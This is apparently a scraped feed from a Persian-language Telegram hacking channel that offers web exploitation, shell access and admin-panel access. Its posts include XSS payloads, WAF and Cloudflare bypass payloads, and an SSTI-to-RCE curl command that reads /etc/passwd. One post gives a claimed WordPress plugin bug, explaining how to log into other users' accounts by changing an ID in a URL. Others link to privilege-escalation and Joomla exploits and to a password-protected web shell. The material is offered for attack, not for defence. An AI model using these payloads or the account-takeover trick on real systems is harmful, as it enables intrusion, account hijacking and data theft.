0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.27K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Tiny XSS Payloads

A
collection of tiny XSS Payloads that can be used in different contexts.

Github

#Xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝5👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1

پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E

بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1

#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
6👍31
سرچ انجین Hunter

Hunter.how

#Shodan #osint #hunter
——————
0Day.Today
@LearnExploit
@Tech_Army
👌51👍1
ورود آیفون ممنوع شد .

طبق ابلاغیه مدیر کل دفتر واردات گمرک ایران از اول اسفندماه گوشی تلفن همراه با نشان تجاری اپل، مدل ۱۴ و کلیه مدل‌های بعد از آن، جزء لیست کالاهای مجاز همراه مسافر و پستی ورودی به کشور نیست.

وزارت صمت مرجع صادرکننده این ابلاغیه است.


#news
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔4👌3🤨3
This media is not supported in your browser
VIEW IN TELEGRAM
LPE via StorSvc

Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)

Github

#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝2
این آخرین باری هست که اینترنت اکسپلورر رو میبینید، مایکروسافت امروز آپدیتی برای حذفش منتشر میکنه . 🖤

#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🫡13😢7👌21👍1👏1🎉1
Unusual 403 Bypass to a full website takeover

Read Here

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
3👍1
SSH Remote Code Execution ( SSH Zero-Day )

Github

#SSH
——————
0Day.Today
@LearnExploit
@Tech_Army
reNgine 🔥

The only web application recon tool you will ever need!

Github

#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
4❤‍🔥1
CVE-2023-23752

An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints

severity: high 🆘

Github

#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
┌──(LearnExploit㉿kali)-[~]
└─$ ./Thank-you-all

#4k
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8
Cloudflare bypass & template injection to XSS in one shoot

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
4
تمرینی

Link

Pass: $SZh496W&#uv

#shell #alfa
——————
0Day.Today
@LearnExploit
@Tech_Army
👍42❤‍🔥1
آموزش نصب Metasploit روی ویندوز

Metasploit

#metasploit #exploit #windows

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥41👍1
Akamai WAF bypass through right-click

<details onauxclick=confirm`xss`></details>

#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
22
SSTI to RCE:

curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"

#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥5👍1